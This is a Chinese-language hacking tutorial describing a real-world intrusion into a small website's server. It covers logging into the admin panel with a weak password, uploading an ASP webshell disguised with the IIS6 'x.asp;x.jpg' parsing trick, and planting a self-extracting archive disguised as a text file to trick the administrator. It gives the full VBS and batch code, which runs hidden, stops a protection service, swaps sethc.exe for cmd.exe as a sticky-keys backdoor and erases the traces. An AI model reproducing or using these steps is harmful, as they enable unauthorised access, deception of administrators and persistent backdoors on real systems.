新手的入侵提权之路 -电脑资料

    话说某天上网冲浪，无意间来到了一个小站，习惯性地在网址后加了个admin，蹦出了后台登陆页面，又随手试了一下弱口令admin/admin，

新手的入侵提权之路

。竟然成功进去了！赶紧去拿shell，找到上传图片的地方，上传了名为x.asp;x.jpg的asp木马（利用了iis6的文件名解析漏洞）幸运地没被重命名。顺利地有了webshell，如图1。定了定神，开始提权。

    shell的权限很小，只能在网站目录下活动，cmd命令也无法执行，自己上传个cmd也一样。用shell自带的环境检测功能发现能解析aspx，就赶紧上传了个aspxspy2，如图2。权限大了一点，c盘只能浏览，其他各盘可以新建目录，并可以在新建的目录与网站目录下上传文件，但不可以修改原有的文件。注册表，服务，进程等也都只能看。cmd可以执行一些简单的命令，但加用户不行。扫了一下服务器开的端口，开了80，1433，3389。说明服务器上存在mssql，那就去网站目录里找找数据库连接文件吧，运气好的话有个sa在等着我呢。可惜不幸的是，我在成堆的文件了找了半天，找到的全是access的。又去翻遍了服务器上的所有盘，也都没有发现一些我所知的可以用来提权的软件。最后用了一下巴西考肉，可执行起来也没反映。大概是漏洞补上了。至此，我陷入了绝境。

    二 转折

    郁闷的我翻出了n本x档案，复习了半天，看到路人甲大牛的《社工渗透某大型信息港》时，我灵光一现，对啊，可以社工啊。当时路人甲大牛用的是免杀的pcshare与chm电子书社工下的服务器。可我虽会点免杀，但一来麻烦，二来嫌自己的马不够隐蔽，三来怕马马的作者留后门。而且我用电子书制作器捣鼓了半天，也没学会如何制作电子书木马。刚刚不是扫出了3389么，我来连接一下，如图3，出现了登陆界面。那我何不“借”管理员之手替换粘滞键呢。经过一个晚上的思索，我终于想出了这个精妙的方法。

    由于shell无法在服务器的根目录下上传文件，所以为了让管理员掉进我们精心设计好的陷阱。我只能在根目录下新建了一个醒目的目录。这儿我就在E盘下新建了 您的网站存在危险！ 这个目录，待会我们要把做好的陷阱文件放在这里。

    那么如何“借”管理员之手替换粘滞键呢？我想到了bat与rar。有些人说rar的自解压的高级自解压选项中的“解压前运行”与“解压后运行”不稳定，有时设置的文件不会被运行，最好只填后一个。其实他们对这两个选项不了解，所以这里还是先给菜菜们补习一下。“解压前运行”指的是解压前运行解压路径下的指定文件。同样“解压后运行”指的是解压后运行解压路径下的指定文件。假设我填解压路径为c:\，解压前运行a.exe，解压后运行b.exe。则第一次双击后。由于c:\下还没有a.exe，解压前自然运行不了a.exe。而之后每次双击时，由于第一次已将a.exe解压到了c:\所以之后每次解压前，a.exe都会被运行。至于b.exe，由于他是解压后运行的。那时b.exe早已被解压到了c:\下，所以不论第几次双击他都会被运行。

    好了，正式开工。先准备3个文件。新建一个txt输入

    Set ws=CreateObject("Wscript.Shell")

    ws.run "cmd /c s.bat",vbhide

    然后保存为hide.vbs我们要用它来隐藏运行s.bat，

电脑资料

《新手的入侵提权之路》(https://www.unjs.com)。然后我们来写这个s.bat.再新一个txt输入

    del /s /q /f /a E:\您的网站存在危险！\您的网站存在危险！.exe

    copy 您的网站存在危险.txt E:\您的网站存在危险！\您的网站存在危险！.txt /y //删除陷阱文件，用解压出的txt复制进来偷梁换株

    sc config cryptsvc start= auto

    sc stop cryptsvc //停止文件保护服务为替换做准备

    copy C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\dllcache\sethc.exe /y

    copy C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\sethc.exe /y //粘滞键替换

    del /s /q /f /a hide.vbs

    del /s /q /f /a s.exe

    del /s /q /f /a %0 //清除中间文件

    完成后保存为s.bat。注意 E:\您的网站存在危险！\您的网站存在危险！.exe 就是最终上传到服务器上的陷阱文件的路径，所以我们最后要把做好的陷阱文件改名为 您的网站存在危险！.exe 而 您的网站存在危险！.txt 就是下一步我们要做的用来迷惑管理员的一个文本（文件名要与陷阱文件名相同）新建一个txt，写点警告的话保存为 您的网站存在危险！.txt

    文件备齐了，我们要在txt被打来开时运行hide.vbs，所以根据前文的知识我们要在自解压中套上自解压。选中s.bat与hide.vbs，右键，添加到压缩文件，确定后打开新生成的RAR，自解压格式，高级自解压选项，解压路径我填C:\windows，解压前运行 您的网站存在危险！.txt 解压后运行 hide.vbs，如图4，来到模式选项卡，选择全部隐藏，覆盖所有文件，确定后生成了一个exe，我把它命名成了s.exe。再将 s.exe 与 您的网站存在危险！.txt 制成自解压，注意～要与上一步一致，我这儿也就是 C:\windows， 解压后运行s.exe，全部隐藏，覆盖所有文件，再来到文本和图标选项卡，在 从文件加载自解压图标处选一个txt的图标，如图5，确定后陷阱文件就做好了。把它命名为 您的网站存在危险！.exe后传到刚刚在服务器上新建的目录里，就等管理员点了。

    来说一下效果，管理员双击后，您的网站存在危险！.txt被打开展现在管理员面前，同时 您的网站存在危险！.exe被删除，取而代之的是 您的网站存在危险.txt 最后粘滞键被替换，中间文件被清除。由于陷阱文件与那个txt的图标相同，文件名相同，前后只有后缀的区别，应该很少有人能注意。即使他打开后觉得不对劲，那也来不及了，所有中间文件都被清除了，没留下半点蛛丝马迹，他也只能认为他一开始点的就是 您的网站存在危险！.txt。但事实上粘滞键已被替换，而且这个陷阱文件杀软不杀，运行时安全软件也不会有任何提示，加上粘滞键后门的优点…呵呵

    三 总结